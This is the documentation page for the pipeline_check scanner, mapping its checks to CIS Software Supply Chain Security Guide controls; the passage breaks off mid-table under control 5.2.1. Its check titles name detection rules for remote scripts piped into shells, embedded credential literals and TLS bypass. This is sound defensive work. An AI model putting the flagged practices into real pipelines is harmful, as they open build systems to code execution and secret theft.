CIS Software Supply Chain Security Guide
- Version: 1.0
- URL: https://www.cisecurity.org/benchmark/software_supply_chain_security
- Source of truth: pipeline_check/core/standards/data/cis_supply_chain.py
CIS Software Supply Chain Security Guide. Source, build, dependency, and artifact controls covering the full pipeline trust chain.
At a glance
- Controls in this standard: 25
- Controls evidenced by at least one check: 25 / 25
- Distinct checks evidencing this standard: 197
- Of those, autofixable with --fix: 43
How to read severity
Every check below ships at a fixed severity level. The scale is the same across providers and standards so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.
| Level | What it means | Examples |
|---|---|---|
| CRITICAL | Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. | Hardcoded credential literal, branch ref pointing at a known-compromised action, sign-in to an unverified registry. |
| HIGH | Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. | Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod. |
| MEDIUM | Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. | Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window. |
| LOW | Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. | Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push. |
| INFO | Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. | CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed. |
Coverage by control
Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).
| Control | Title | Checks | Severity mix |
|---|---|---|---|
| 1.1.5 | Ensure any change to code requires the review of additional strong authenticators | 9 | 2H · 6M · 1L |
| 1.1.6 | Ensure any change to code is signed | 1 | 1M |
| 1.1.7 | Ensure any change to code is automatically scanned for risks (SAST) | 2 | 2M |
| 1.1.8 | Ensure scanners are in place to identify and confirm presence of vulnerabilities (SCA) | 1 | 1M |
| 1.1.17 | Ensure default branches' commits are protected from being deleted/rewritten | 4 | 3H · 1L |
| 1.3.4 | Ensure organization identity is required for contribution (no long-lived personal tokens) | 6 | 4H · 2M |
| 1.4.1 | Ensure third-party artifacts and open-source libraries are verified | 36 | 2C · 21H · 9M · 4L |
| 1.5.1 | Ensure scanners are in place to identify and prevent sensitive data in code | 2 | 2H |
| 2.1.3 | Ensure the build environment is hardened | 32 | 8C · 16H · 7M · 1L |
| 2.1.6 | Ensure build workers have minimal network connectivity | 8 | 1C · 3H · 4M |
| 2.2.2 | Ensure build workers are single-use | 7 | 3M · 4L |
| 2.3.4 | Ensure pipelines are scanned for secrets and sensitive data | 14 | 9C · 3H · 1M · 1L |
| 2.3.7 | Ensure pipeline steps produce audit logs | 5 | 1H · 2M · 2L |
| 2.3.8 | Ensure pipeline configuration files are reviewed before execution | 16 | 3C · 6H · 4M · 3L |
| 2.4.2 | Ensure pipeline integrity, artifacts are signed by the pipeline | 4 | 4M |
| 2.4.3 | Ensure access to the pipeline execution environment is restricted | 17 | 6C · 3H · 8M |
| 3.1.3 | Ensure signed metadata of dependencies is verified | 25 | 1C · 10H · 14M |
| 3.1.5 | Ensure only trusted package managers and repositories are used | 20 | 18H · 1M · 1L |
| 4.1.1 | Ensure all artifacts on all releases are verified (signed, integrity-checked) | 17 | 3H · 14M |
| 4.2.1 | Ensure access to artifacts is limited | 4 | 2C · 1H · 1M |
| 4.3.3 | Ensure package registries use authentication and authorisation | 1 | 1C |
| 4.4.1 | Ensure artifacts have provenance/SBOM metadata | 19 | 1H · 13M · 5L |
| 5.1.4 | Ensure deployment configuration manifests are reviewed before apply | 8 | 2H · 6M |
| 5.2.1 | Ensure deployment environments are separated | 4 | 1H · 3M |
| 5.2.3 | Ensure deployment environment activity is audited | 2 | 1M · 1L |
Filter at runtime
Restrict a scan to checks that evidence this standard with --standard cis_supply_chain:
```shell
# All providers, only checks tied to this standard
pipeline_check --standard cis_supply_chain

# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard cis_supply_chain

# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard cis_supply_chain --standard owasp_cicd_top_10
```
Controls in scope
1.1.5: Ensure any change to code requires the review of additional strong authenticators
Evidenced by 9 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| SCM-002 | Default branch protection does not require pull request reviews | HIGH | SCM | |
| SCM-008 | Default branch protection does not require status checks | MEDIUM | SCM | |
| SCM-010 | Branch protection allows administrators to bypass | HIGH | SCM | |
| SCM-011 | Default branch protection does not require CODEOWNERS reviews | MEDIUM | SCM | |
| SCM-012 | Default branch protection keeps stale reviews after a push | MEDIUM | SCM | |
| SCM-013 | Default branch protection does not require conversation resolution | LOW | SCM | |
| SCM-014 | Default branch protection does not require approval of the most recent push | MEDIUM | SCM | |
| SCM-017 | Repository has no CODEOWNERS file | MEDIUM | SCM | |
| SCM-018 | Required PR reviews can be bypassed by named identities | MEDIUM | SCM | |
1.1.6: Ensure any change to code is signed
Evidenced by 1 check across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| SCM-006 | Default branch protection does not require signed commits | MEDIUM | SCM | |
1.1.7: Ensure any change to code is automatically scanned for risks (SAST)
Evidenced by 2 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| SCM-003 | GitHub default code scanning is not enabled | MEDIUM | SCM | |
| SCM-008 | Default branch protection does not require status checks | MEDIUM | SCM | |
1.1.8: Ensure scanners are in place to identify and confirm presence of vulnerabilities (SCA)
Evidenced by 1 check across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| SCM-005 | Dependabot security updates are not enabled | MEDIUM | SCM | |
1.1.17: Ensure default branches' commits are protected from being deleted/rewritten
Evidenced by 4 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| SCM-001 | Default branch has no protection rule | HIGH | SCM | |
| SCM-007 | Default branch protection allows force-pushes | HIGH | SCM | |
| SCM-009 | Default branch protection allows branch deletion | HIGH | SCM | |
| SCM-019 | Push restrictions allowlist names individual users | LOW | SCM | |
1.3.4: Ensure organization identity is required for contribution (no long-lived personal tokens)
Evidenced by 6 checks across 3 providers (AWS, CircleCI, GitHub Actions).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CB-006 | CodeBuild source auth uses long-lived token | HIGH | AWS | |
| CC-005 | AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
| CC-019 | add_ssh_keys without fingerprint restriction | HIGH | CircleCI | |
| CP-004 | Legacy ThirdParty/GitHub source action (OAuth token) | HIGH | AWS | |
| GHA-005 | AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
| IAM-005 | CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
1.4.1: Ensure third-party artifacts and open-source libraries are verified
Evidenced by 36 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, SCM, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-001 | Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
| ADO-005 | Container image not pinned to specific version | HIGH | Azure DevOps | |
| ARGO-001 | Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
| ARGO-008 | Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
| ARGO-012 | No vulnerability scanning step | MEDIUM | Argo Workflows | |
| BB-001 | pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
| BK-001 | Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| BK-012 | No vulnerability scanning step | MEDIUM | Buildkite | |
| CB-005 | Outdated managed build image | MEDIUM | AWS | |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-003 | Docker image not pinned by digest | HIGH | CircleCI | |
| CC-016 | Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
| CC-020 | No vulnerability scanning step | MEDIUM | CircleCI | |
| DF-001 | FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| DF-010 | apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
| DF-011 | Package manager install without cache cleanup in same layer | LOW | Dockerfile | |
| ECR-001 | Image scanning on push not enabled | HIGH | AWS | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-004 | dynamicSubstitutions on with user substitutions in step args | HIGH | Cloud Build | |
| GCB-007 | availableSecrets references versions/latest | MEDIUM | Cloud Build | 🔧 fix |
| GCB-012 | Credential-shaped literal in pipeline body | CRITICAL | Cloud Build | |
| GCB-025 | Build has no tags for audit / discoverability | LOW | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| GHA-040 | Action reference matches a known-compromised SHA or tag | CRITICAL | GitHub Actions | |
| GL-001 | Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| HELM-001 | Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
| HELM-004 | Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
| HELM-008 | Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
| SCM-016 | Private vulnerability reporting is not enabled | LOW | SCM | |
| TKN-001 | Tekton step image not pinned to a digest | HIGH | Tekton | |
| TKN-008 | Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
| TKN-012 | No vulnerability scanning step | MEDIUM | Tekton | |
1.5.1: Ensure scanners are in place to identify and prevent sensitive data in code
Evidenced by 2 checks across SCM.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| SCM-004 | GitHub secret scanning is not enabled | HIGH | SCM | |
| SCM-015 | Secret scanning push protection is not enabled | HIGH | SCM | |
2.1.3: Ensure the build environment is hardened
Evidenced by 32 checks across 11 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-002 | Script injection via attacker-controllable context | HIGH | Azure DevOps | |
| ARGO-002 | Argo template container runs privileged or as root | HIGH | Argo Workflows | |
| ARGO-004 | Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
| ARGO-005 | Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
| BB-002 | Script injection via attacker-controllable context | HIGH | Bitbucket | |
| BK-003 | Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
| BK-005 | Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
| CB-002 | Privileged mode enabled | HIGH | AWS | |
| CB-005 | Outdated managed build image | MEDIUM | AWS | |
| CC-002 | Script injection via untrusted environment variable | HIGH | CircleCI | |
| CC-010 | Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
| CC-012 | Dynamic config via setup: true enables code injection | MEDIUM | CircleCI | |
| CC-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
| DF-002 | Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
| DF-005 | RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
| DF-008 | RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
| DF-012 | RUN invokes sudo | HIGH | Dockerfile | |
| DF-013 | EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
| DF-014 | WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
| DF-015 | RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
| DF-017 | ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
| DF-018 | RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
| ECR-004 | No lifecycle policy configured | LOW | AWS | |
| GCB-002 | Cloud Build uses the default service account | HIGH | Cloud Build | |
| GCB-016 | Step dir field contains parent-directory escape (..) | MEDIUM | Cloud Build | |
| GCB-019 | Shell entrypoint inlines a user substitution into args | HIGH | Cloud Build | |
| GHA-002 | pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
| GHA-003 | Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
| GL-002 | Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
| TKN-002 | Tekton step runs privileged or as root | HIGH | Tekton | |
| TKN-003 | Tekton param interpolated unsafely in step script | CRITICAL | Tekton | |
| TKN-004 | Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton | |
2.1.6: Ensure build workers have minimal network connectivity
Evidenced by 8 checks across 4 providers (AWS, CircleCI, Cloud Build, Dockerfile).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CB-002 | Privileged mode enabled | HIGH | AWS | |
| CC-010 | Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
| CC-014 | Job missing resource_class declaration | MEDIUM | CircleCI | |
| DF-013 | EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
| GCB-010 | Remote script piped to shell interpreter | HIGH | Cloud Build | |
| GCB-013 | Package install bypasses registry integrity (git / path / tarball) | MEDIUM | Cloud Build | |
| GCB-021 | No private worker pool, build runs on the shared default pool | MEDIUM | Cloud Build | 🔧 fix |
| PBAC-001 | CodeBuild project has no VPC configuration | HIGH | AWS | |
2.2.2: Ensure build workers are single-use
Evidenced by 7 checks across 6 providers (AWS, Argo Workflows, Bitbucket, Buildkite, CircleCI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-007 | Argo workflow has no activeDeadlineSeconds | LOW | Argo Workflows | |
| BB-005 | Step has no max-time, unbounded build | MEDIUM | Bitbucket | 🔧 fix |
| BK-006 | Step has no timeout_in_minutes | LOW | Buildkite | |
| CB-004 | No build timeout configured | LOW | AWS | |
| CC-015 | No no_output_timeout configured | MEDIUM | CircleCI | 🔧 fix |
| PBAC-002 | CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
| TKN-006 | Tekton run lacks an explicit timeout | LOW | Tekton | |
2.3.4: Ensure pipelines are scanned for secrets and sensitive data
Evidenced by 14 checks across 10 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-003 | Variables contain literal secret values | CRITICAL | Azure DevOps | |
| ARGO-006 | Literal secret value in Argo template env or parameter default | CRITICAL | Argo Workflows | 🔧 fix |
| BB-003 | Variables contain literal secret values | CRITICAL | Bitbucket | |
| BK-002 | Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
| CB-001 | Secrets in plaintext environment variables | CRITICAL | AWS | |
| CC-004 | Secret-like environment variable not managed via context | MEDIUM | CircleCI | |
| CC-008 | Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
| DF-006 | ENV or ARG carries a credential-shaped literal value | CRITICAL | Dockerfile | |
| DF-019 | COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
| DF-020 | ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
| GCB-003 | Secret Manager value referenced in step args | HIGH | Cloud Build | |
| GCB-005 | Build timeout unset or excessive | LOW | Cloud Build | 🔧 fix |
| GL-003 | Variables contain literal secret values | CRITICAL | GitLab CI | |
| TKN-005 | Literal secret value in Tekton step env or param default | CRITICAL | Tekton | 🔧 fix |
2.3.7: Ensure pipeline steps produce audit logs
Evidenced by 5 checks across 3 providers (AWS, CircleCI, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CB-003 | Build logging not enabled | MEDIUM | AWS | |
| CC-011 | No store_test_results step (test results not archived) | LOW | CircleCI | |
| GCB-006 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
| GCB-017 | Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
| S3-004 | Artifact bucket access logging not enabled | LOW | AWS | |
2.3.8: Ensure pipeline configuration files are reviewed before execution
Evidenced by 16 checks across 11 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-002 | Script injection via attacker-controllable context | HIGH | Azure DevOps | |
| ARGO-005 | Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
| BB-002 | Script injection via attacker-controllable context | HIGH | Bitbucket | |
| BK-003 | Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
| BK-007 | Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
| CB-007 | CodeBuild webhook has no filter group | MEDIUM | AWS | |
| CC-009 | Deploy job missing manual approval gate | MEDIUM | CircleCI | |
| CC-013 | Deploy job in workflow has no branch filter | MEDIUM | CircleCI | |
| CP-001 | No approval action before deploy stages | HIGH | AWS | |
| CP-003 | Source stage using polling instead of event-driven trigger | LOW | AWS | |
| GCB-014 | Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
| GCB-022 | options.substitutionOption set to ALLOW_LOOSE | LOW | Cloud Build | 🔧 fix |
| GHA-002 | pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
| GL-002 | Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
| HELM-006 | Chart.yaml does not declare a kubeVersion compatibility range | LOW | Helm | |
| TKN-003 | Tekton param interpolated unsafely in step script | CRITICAL | Tekton | |
2.4.2: Ensure pipeline integrity, artifacts are signed by the pipeline
Evidenced by 4 checks across 2 providers (AWS, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| GCB-008 | No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
| GCB-015 | SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) | MEDIUM | Cloud Build | |
| GCB-023 | Step references a user substitution not declared in substitutions: | MEDIUM | Cloud Build | |
2.4.3: Ensure access to the pipeline execution environment is restricted
Evidenced by 17 checks across 9 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-003 | Variables contain literal secret values | CRITICAL | Azure DevOps | |
| ARGO-003 | Argo workflow uses the default ServiceAccount | MEDIUM | Argo Workflows | |
| BB-003 | Variables contain literal secret values | CRITICAL | Bitbucket | |
| CB-001 | Secrets in plaintext environment variables | CRITICAL | AWS | |
| CC-004 | Secret-like environment variable not managed via context | MEDIUM | CircleCI | |
| CC-008 | Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
| GCB-026 | Step waitFor: references an unknown step id | MEDIUM | Cloud Build | |
| GHA-004 | Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
| GL-003 | Variables contain literal secret values | CRITICAL | GitLab CI | |
| IAM-001 | CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
| IAM-002 | CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
| IAM-003 | CI/CD role has no permission boundary | MEDIUM | AWS | |
| IAM-004 | CI/CD role can PassRole to any role | HIGH | AWS | |
| IAM-005 | CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
| IAM-006 | Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
| PBAC-002 | CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
| TKN-007 | Tekton run uses the default ServiceAccount | MEDIUM | Tekton | |
3.1.3: Ensure signed metadata of dependencies is verified
Evidenced by 25 checks across 10 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-001 | Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
| ARGO-012 | No vulnerability scanning step | MEDIUM | Argo Workflows | |
| BK-008 | TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
| BK-012 | No vulnerability scanning step | MEDIUM | Buildkite | |
| CC-020 | No vulnerability scanning step | MEDIUM | CircleCI | |
| CC-021 | Package install without lockfile enforcement | MEDIUM | CircleCI | 🔧 fix |
| CC-022 | Dependency update command bypasses lockfile pins | MEDIUM | CircleCI | 🔧 fix |
| DF-001 | FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| ECR-001 | Image scanning on push not enabled | HIGH | AWS | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-004 | dynamicSubstitutions on with user substitutions in step args | HIGH | Cloud Build | |
| GCB-007 | availableSecrets references versions/latest | MEDIUM | Cloud Build | 🔧 fix |
| GHA-040 | Action reference matches a known-compromised SHA or tag | CRITICAL | GitHub Actions | |
| GHA-041 | Action upstream repo has a single contributor | MEDIUM | GitHub Actions | |
| GHA-042 | Action upstream repo is newly created | MEDIUM | GitHub Actions | |
| GHA-043 | Low-star action runs with sensitive permissions | HIGH | GitHub Actions | |
| GHA-047 | Action ref resolves to a recently committed tag or SHA | MEDIUM | GitHub Actions | |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| HELM-001 | Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
| HELM-002 | Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
| HELM-004 | Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
| HELM-008 | Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
| TKN-001 | Tekton step image not pinned to a digest | HIGH | Tekton | |
| TKN-012 | No vulnerability scanning step | MEDIUM | Tekton | |
3.1.5: Ensure only trusted package managers and repositories are used
Evidenced by 20 checks across 11 providers (Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-001 | Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
| ADO-005 | Container image not pinned to specific version | HIGH | Azure DevOps | |
| ARGO-008 | Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
| BB-001 | pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
| BK-001 | Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-003 | Docker image not pinned by digest | HIGH | CircleCI | |
| CC-016 | Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
| CC-018 | Package install from insecure source | HIGH | CircleCI | 🔧 fix |
| CC-023 | TLS / certificate verification bypass | HIGH | CircleCI | 🔧 fix |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| GCB-011 | TLS / certificate verification bypass | HIGH | Cloud Build | 🔧 fix |
| GCB-018 | Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) | MEDIUM | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| GL-001 | Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| HELM-003 | Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
| HELM-009 | Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
| TKN-008 | Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
4.1.1: Ensure all artifacts on all releases are verified (signed, integrity-checked)
Evidenced by 17 checks across 10 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-006 | Artifacts not signed | MEDIUM | Azure DevOps | |
| ARGO-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Argo Workflows | |
| ARGO-011 | No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
| BB-006 | Artifacts not signed | MEDIUM | Bitbucket | |
| BK-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
| BK-011 | No SLSA provenance attestation produced | MEDIUM | Buildkite | |
| CC-006 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | CircleCI | |
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| ECR-005 | Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
| GHA-006 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | GitHub Actions | |
| GL-006 | Artifacts not signed | MEDIUM | GitLab CI | |
| HELM-002 | Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
| S3-002 | Artifact bucket server-side encryption not configured | HIGH | AWS | |
| S3-003 | Artifact bucket versioning not enabled | MEDIUM | AWS | |
| TKN-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Tekton | |
| TKN-011 | No SLSA provenance attestation produced | MEDIUM | Tekton | |
4.2.1: Ensure access to artifacts is limited
Evidenced by 4 checks across 2 providers (AWS, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ECR-003 | Repository policy allows public access | CRITICAL | AWS | |
| GCB-020 | serviceAccount points at the default Cloud Build service account | HIGH | Cloud Build | |
| S3-001 | Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
| S3-005 | Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
4.3.3: Ensure package registries use authentication and authorisation
Evidenced by 1 check across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ECR-003 | Repository policy allows public access | CRITICAL | AWS | |
4.4.1: Ensure artifacts have provenance/SBOM metadata
Evidenced by 19 checks across 12 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-007 | SBOM not produced | MEDIUM | Azure DevOps | |
| ARGO-010 | No SBOM generated for build artifacts | MEDIUM | Argo Workflows | |
| ARGO-011 | No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
| BB-007 | SBOM not produced | MEDIUM | Bitbucket | |
| BK-010 | No SBOM generated for build artifacts | MEDIUM | Buildkite | |
| BK-011 | No SLSA provenance attestation produced | MEDIUM | Buildkite | |
| CC-007 | SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | CircleCI | |
| DF-016 | Image lacks OCI provenance labels | LOW | Dockerfile | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| GCB-009 | Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
| GCB-024 | Build pushes Docker images but top-level images: is empty | LOW | Cloud Build | |
| GHA-007 | SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | GitHub Actions | |
| GL-007 | SBOM not produced | MEDIUM | GitLab CI | |
| HELM-005 | Chart maintainers field empty or missing chain-of-custody info | LOW | Helm | |
| HELM-007 | Chart.yaml description field is empty or missing | LOW | Helm | |
| HELM-010 | Chart.yaml appVersion field is empty or missing | LOW | Helm | |
| S3-003 | Artifact bucket versioning not enabled | MEDIUM | AWS | |
| TKN-010 | No SBOM generated for build artifacts | MEDIUM | Tekton | |
| TKN-011 | No SLSA provenance attestation produced | MEDIUM | Tekton | |
5.1.4: Ensure deployment configuration manifests are reviewed before apply
Evidenced by 8 checks across 6 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, GitLab CI).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-004 | Deployment job missing environment binding | MEDIUM | Azure DevOps | |
| BB-004 | Deploy step missing deployment: environment gate | MEDIUM | Bitbucket | |
| BK-007 | Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
| CC-009 | Deploy job missing manual approval gate | MEDIUM | CircleCI | |
| CD-001 | Automatic rollback on failure not enabled | MEDIUM | AWS | |
| CD-002 | AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
| CP-001 | No approval action before deploy stages | HIGH | AWS | |
| GL-004 | Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
5.2.1: Ensure deployment environments are separated
Evidenced by 4 checks across 4 providers (AWS, Azure DevOps, Bitbucket, GitLab CI).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-004 | Deployment job missing environment binding | MEDIUM | Azure DevOps | |
| BB-004 | Deploy step missing deployment: environment gate | MEDIUM | Bitbucket | |
